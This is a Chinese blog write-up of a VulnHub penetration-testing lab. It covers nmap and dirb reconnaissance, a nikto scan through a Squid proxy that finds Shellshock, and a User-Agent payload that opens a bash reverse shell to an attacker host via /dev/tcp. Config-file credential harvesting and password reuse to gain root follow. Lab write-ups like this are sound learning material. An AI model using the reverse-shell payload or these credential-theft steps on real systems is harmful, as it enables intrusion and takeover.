2019-01-09-Vulnhub渗透测试实战writeup(11)

从这一个起争取不看writeup自己把他做出来。。。。
首先安装以后就老是ping不通，换了网卡也不行，后来多次折腾感觉应该是防火墙的问题，于是一波 sudo ufw disable就解决了,学习一波。。。

p1

然后直接首页截个图吧！

p2

然后nmap一波。。。

# Nmap 7.40 scan initiated Wed Jan  9 04:07:33 2019 as: nmap -A -sV -p- -oN 1.xml 192.168.110.138
Nmap scan report for 192.168.110.138
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
80/tcp   open  http       Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open  http-proxy Squid http proxy 3.1.19//代理?
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:8B:82:EE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms 192.168.110.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan  9 04:08:30 2019 -- 1 IP address (1 host up) scanned in 57.20 seconds

robots.txt上disallow的是wolfcms。
再继续上dirb一波

+ http://192.168.110.138/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.110.138/connect (CODE:200|SIZE:109)//一波嘲笑，但是说明有python环境
+ http://192.168.110.138/index (CODE:200|SIZE:21)
+ http://192.168.110.138/index.php (CODE:200|SIZE:21)
+ http://192.168.110.138/robots (CODE:200|SIZE:45)
+ http://192.168.110.138/robots.txt (CODE:200|SIZE:45)//暴露wolfcms
+ http://192.168.110.138/server-status (CODE:403|SIZE:296)

所有的突破口里面cms可能是最重的，所以我从cms入手先吧！
cms用的是wolfcms，直接dirb http://192.168.110.138/wolfcms 没发现登录界面，于是Google了一波，发现github上有开源出来https://github.com/wolfcms/wolfcms,但是翻了几遍都木有发现有登录界面的URL模板路径，所以这条路径就不行了。
不行的话我就想着说能不能从主机漏洞入手，所以看了看nmap的扫描记录，80没啥利用的，22虽然很老但是爆出的漏洞都是一些dos或者用户枚举什么的，虽然漏洞很多但是不实用，所以只能从squid入手，wikipedea告诉我这是一个http代理软件，后来看了walkthrough发现意思是要通过这个端口来访问80端口才能访问到，原来是不用关掉ufw服务的。。。
然后看了下那个squid版本发现metasploit有个缓冲区溢出漏洞可以用，04年很老的，但是最后没用成功。。。

p3

然后可以用nikto扫描一波，命令

nikto -h 192.168.110.138 --useproxy http://192.168.110.138:3128

发现有个shellsock漏洞

p4

研究了一番，metasploit上有一个模块可以用，但是都需要cgi文件的路径，科普一下cgi文件夹下放一些脚本，用于服务器处理交互式请求，但是这里没有文件名，所以用不了。。。。

p5

那怎么办？陷入困境ing,这条路走不通了啊，主机漏洞。。。
只能看一波walkthrough了，看了网上大神的描述，发现有大神直接发现那个shellshock以后，就直接在burp上面发送bash反弹语句，直接反弹回来，这操作？？？黑人问号

这里科普一下学到的知识，主要是这里的环境是需要代理才能访问的，所以你用Burpsuite抓包以后还得设置代理，让burp发包到那个代理进行http转发

p6

这样就能正常做repeater了。
然后根据大佬做法是直接在user-agent处直接反弹的，截图如下：

payload:() { ignored;};/bin/bash -i >& /dev/tcp/192.168.110.128/7777 0>&1

p7

p8

那么接下来就是后渗透攻击了
进来以后直接找配置文件

find ./  -name config.php#为啥找这个，因为前面github开源的网站模板里面的配置文件就叫config.php

然后发现登录名和密码了哈哈

p9

猜测ssh会不会也是该密码，先找用户名一波。。。

p10

捕捉到了用户名了，直接su一波试试

p11

直接连ROOT都登陆了2333
剩下就没啥了

p12

总结：这个主要学习了代理的用法，接触了shellshock漏洞，然后神用法。。。。后面就没啥了。